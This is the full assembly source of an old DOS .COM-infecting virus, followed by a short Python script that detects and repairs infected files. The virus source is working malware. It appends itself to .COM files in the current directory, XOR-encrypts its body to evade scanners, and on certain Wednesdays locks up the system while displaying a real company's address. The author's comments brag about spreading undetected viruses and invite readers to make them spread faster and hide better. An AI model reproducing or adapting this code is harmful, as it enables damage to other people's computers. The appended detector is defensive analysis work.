- ;******************************************************************************
- ;
- ; RTL4 / WEDDEN DAT... VIRUS
- ;
- ;******************************************************************************
- ;
- ; "If a weaking linkage found, eliminate...
- ; Hear the cities fearfull roar!"
- ;
- ; Now in front of you lies another source of a virus. It is not a very good
- ; one, but, as you might say, a virus is a virus. After my wake at the PC, I
- ; created several viruses, like:
- ;
- ; Deicide / Glenn
- ; Morgoth
- ; Breeze
- ; Brother
- ; Commentator I
- ; Commentator II
- ; Spawnie
- ; Xmas
- ; 1St_Star / 222
- ; T-1000
- ;
- ; Well, I bet you think this is a whole lot, but some are minor variants, for
- ; which I don't have the guts to publish the source code. I have to admit,
- ; Deicide and Morgoth have spread very well. I uploaded them to a BBS and it
- ; was downloaded several times, and it is not detected by antivirus programs yet.
- ; Deicide is now detectable, but that was my first attempt to make a virus.
- ;
- ; This virus is a Non-Resident Direct Action .COM Infector.
- ; It only infects files in the current directory.
- ; You can recognize an infected file simply, the 4th byte is a '*' (just like
- ; the 1St_Star virus). It is inactive from January till May and starts
- ; replicating from May. After July, every Wednesday after the 21st the
- ; program will hang the system, showing the address of RTL4 Joop v/d Ende
- ; Productions.
- ;
- ; Disclaimer : This program is like all other virus sources only for
- ; educational purposes and should not be given to irresponsible hands
- ; (John McAfee and people like him).
- ;
- ; For the criminal reader : Don't just change the text of this virus and
- ; say you made a virus. Instead use some ideas from this virus and create your
- ; own virus if you want to be nasty. Additions to this virus that makes it
- ; spreading faster and makes it harder to detect are welcome, as long as I get
- ; the new source code.
- ;
- ; I want to thank several virus writers for their support with letting McAfee
- ; and Ass. earn his money with making so many updates of SCAN...
- ; Here they are : Bit Addict, XSTC, Dark Helmet, Dark Avenger, Nuke!, Cracker
- ; Jack and many more creators.
- ;
- ; Note to XSTC : Thank you for disassembling the Deicide virus, for I have lost
- ; the source code. Next time write a message, because I might have the source
- ; code of the virus ready, but not uploaded. It saves you time, so you may
- ; disassemble another virus (of course only for educational purposes ;-) )
- ;
- ; Now have fun with this virus, written in A86 assembler version 3.22
- ;
- ; Glenn Benton
- ;
- ; "Is it truly a disembodied head lurking in the dark of the tombs of fate?"
- ;
- Org 0h ; The outcome will be .BIN
-
- Start: Jmp MainVir ; Jump to main virus
- Db '*' ; signature
-
- MainVir: Call On1 ; Get virus offset
- On1: Pop BP ; BP is the index register
- Sub BP,Offset MainVir+3 ; Calculate virus offset
- Push Ax ; And store AX (error reg.)
-
- Lea Si,Crypt[BP] ; Decryptor for the
- Mov Di,Si ; virus code. It's long
- Mov Cx,CryptLen ; for a decoder, but it
- Decrypt: Lodsb ; reduces the recognizable
- Xor Al,0 ; part enough.
- Stosb ;
- Loop Decrypt ;
-
- DecrLen Equ $-MainVir ; Decryptor length
-
- Crypt: Mov Ax,Cs:OrgPrg[BP] ; Store the 4 first bytes
- Mov Bx,Cs:OrgPrg[BP]+2 ; of the host
- Mov Cs:Start+100h,Ax ;
- Mov Cs:Start[2]+100h,Bx ;
-
- Mov Ah,2ah ; Get date
- Int 21h ; If it is a Wednesday
- Cmp Dh,8 ; after July and after
- Jb NoMsg ; the 21st, it will
- Cmp Dl,22 ; continue, else
- Jb NoMsg ; it goes to NoMsg
- Cmp Al,3 ;
- Jne NoMsg ;
-
- Mov Ah,9 ; Display the message
- Lea Dx,Msg[BP] ;
- Int 21h ;
-
- Lockout: Cli ; And lock the computer
- Jmp Lockout ;
-
- NoMsg: Cmp Dh,5 ; Is it after April?
- Jae DoVirus ; Yes - Replicate
- Jmp Ready ; No - Terminate to host
-
- DoVirus: Mov Ah,1ah ; Move DTA to a safe place
- Mov Dx,0fc00h ; $FE00
- Int 21h
-
- Mov Ah,4eh ;
- Search: Lea Dx,FileSpec[BP] ; Search for a .COM file in
- Xor Cx,Cx ; the current directory
- Int 21h ;
-
- Jnc Found ; If not exist, goto Ready
- Jmp Ready ; else goto Found
-
- Found: Mov Ax,4300h ; Get file attributes
- Mov Dx,0fc1eh ; and store them on the stack
- Int 21h ;
- Push Cx ;
-
- Mov Ax,4301h ; Wipe the attributes, so it
- Xor Cx,Cx ; is accessible for us
- Int 21h ;
-
- Mov Ax,3d02h ; Open the file with
- Int 21h ; read/write priority
-
- Mov Bx,5700h ; Get the file date/time stamp
- Xchg Ax,Bx ; and store them on the stack
- Int 21h ;
- Push Cx ;
- Push Dx ;
-
- Mov Ah,3fh ; Read the first 4 bytes
- Lea Dx,OrgPrg[BP] ; of the program
- Mov Cx,4 ;
- Int 21h ;
-
- Mov Ax,Cs:[OrgPrg][BP] ; Is it a weird EXE?
- Cmp Ax,'MZ' ; Yes goto ExeFile
- Je ExeFile ;
-
- Cmp Ax,'ZM' ; Is it a normal EXE?
- Je ExeFile ; Yes, goto ExeFile
-
- Mov Ah,Cs:[OrgPrg+3][BP] ; Is it already infected?
- Cmp Ah,'*' ; No, goto Infect
- Jne Infect ;
-
- ExeFile: Call Close ; Call File close
-
- Mov Ah,4fh ; Jump to the search routine
- Jmp Search ; again for a .COM file
-
- FSeek: Xor Cx,Cx ; Subroutine for jumping to
- Xor Dx,Dx ; the begin/end of file
- Int 21h ;
- Ret ;
-
- Infect: Mov Ax,4202h ; Jump to EOF
- Call FSeek ;
-
- Sub Ax,3 ; Calculate new virus offset
- Mov Cs:CallPtr[BP]+1,Ax ;
-
- Mov Ah,2ch ; Get system time
- Int 21h ;
-
- Mov Cs:Decrypt+2[BP],Dl ; Move the decryptor part
- Lea Si,MainVir[BP] ; with the 100ds second put
- Mov Di,0fd00h ; into the XOR command to
- Mov Cx,DecrLen ; the end of the 64K segment
- Rep Movsb ;
-
- Lea Si,Crypt[BP] ; Encrypt the virus with
- Mov Cx,CryptLen ; the 100ds seconds.
- Encrypt: Lodsb ; Merge it behind the
- Xor Al,Dl ; decryptor
- Stosb ;
- Loop Encrypt ;
-
- Mov Ah,40h ; Write the virus
- Lea Dx,0fd00h ; at the end of the
- Mov Cx,VirLen ; file
- Int 21h ;
-
- Mov Ax,4200h ; Move to start of
- Call FSeek ; the file
-
- Mov Ah,40h ; Write the jump to the virus
- Lea Dx,CallPtr[BP] ; at the begin of the file
- Mov Cx,4 ;
- Int 21h ;
-
- Call Close ; Close the file
-
- Ready: Mov Ah,1ah ; Restore the DTA to the
- Mov Dx,80h ; original offset
- Int 21h ;
-
- Pop Ax ; Get (possible) error code
-
- Mov Bx,100h ; Strange jump (but nice) to
- Push Cs ; the begin of the program
- Push Bx ; (which has been restored)
- Retf ;
-
- Close: Pop Si ; A pop which is stupid
-
- Pop Dx ; Restore files date/time
- Pop Cx ; stamp
- Mov Ax,5701h ;
- Int 21h ;
-
- Mov Ah,3eh ; Close file
- Int 21h ;
-
- Mov Ax,4301h ; Restore attributes
- Pop Cx ;
- Mov Dx,0fc1eh ;
- Int 21h ;
-
- Push Si ; A push which is stupid
-
- Ret ; Return to caller
-
- CallPtr Db 0e9h,0,0 ; Jump
-
- FileSpec Db '*.COM',0 ; Filesearch spec & signature
-
- ; Activation message
-
- Msg Db 13,10,9,9,'RTL4'
- Db 13,10,'Joop van den Ende Produkties BV'
- Db 13,10,'Marco Daas (Casting Assistent)'
- Db 13,10,'Postbus 397'
- Db 13,10,'1430 AJ AALSMEER'
- Db 13,10,'van Cleeffkade 15'
- Db 13,10,'1413 BA AALSMEER'
- Db 13,10,'The Netherlands'
- Db 13,10,10,'Wedden dat... je een virus hebt?'
- Db 13,10,'$'
-
- ; First 4 bytes of the host program
-
- OrgPrg: Int 20h
- DB 'GB' ; My initials (Glenn Benton)
-
- CryptLen Equ $-Crypt ; Length of encrypted part
-
- VirLen Equ $-MainVir ; Length of virus
- ;
- ; Sleep well, sleep in hell...
- ;
-
-
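A defender-side check for the file layout this listing describes, given here as an added example that is not part of the original source: it tests for the `0E9h` jump plus the `'*'` fourth byte, recovers the single-byte XOR key by searching the appended tail for the `*.COM` string, and rebuilds the host from the four saved bytes at the end of the encrypted region. The function names are hypothetical, the sample file is constructed and contains no virus code, and the code assumes nothing was appended to the file after the virus body.

```python
import struct

MARKER = b"*.COM\x00"   # FileSpec string stored inside the encrypted region (from the listing)

def analyze_com(data: bytes):
    """Return None if the header does not match the described layout, else findings."""
    if len(data) < 4 or data[0] != 0xE9 or data[3] != ord("*"):
        return None
    disp = struct.unpack_from("<H", data, 1)[0]
    body = disp + 3      # the listing stores (old EOF - 3) in the jump, so this is the old EOF
    if body < 4 or body >= len(data):
        return None
    tail = data[body:]
    # The key is the hundredths-of-a-second value (0..99); all 256 values are tried here.
    for key in range(256):
        plain = bytes(b ^ key for b in tail)
        if MARKER in plain:
            # The last 4 bytes of the encrypted region hold the host's original header.
            return {"body_offset": body, "key": key, "orig_head": plain[-4:]}
    # Header matches but no marker: heuristic hit only, could be a clean program.
    return {"body_offset": body, "key": None, "orig_head": None}

def restore(data: bytes):
    """Rebuild the original host, or return None when the match is not confirmed."""
    info = analyze_com(data)
    if not info or info["key"] is None:
        return None
    return info["orig_head"] + data[4:info["body_offset"]]

def make_sample(key=0x37):
    """Constructed test file that only mimics the layout (no virus code)."""
    host = b"\xB4\x09\xBA\x0B\x01\xCD\x21\xCD\x20" + b"hi$"   # constructed 12-byte host
    stub = b"\x90" * 8                                        # stand-in for the plaintext decryptor
    region = b"\x90" * 5 + MARKER + b"constructed text" + host[:4]
    enc = bytes(b ^ key for b in region)
    head = b"\xE9" + struct.pack("<H", len(host) - 3) + b"*"
    return host, head + host[4:] + stub + enc

if __name__ == "__main__":
    host, infected = make_sample()
    print(analyze_com(infected))
    print(restore(infected) == host)
```

A header match with `key` set to `None` should be treated as a lead for manual review rather than a detection, since a clean .COM file can legitimately start with a jump and have `'*'` as its fourth byte.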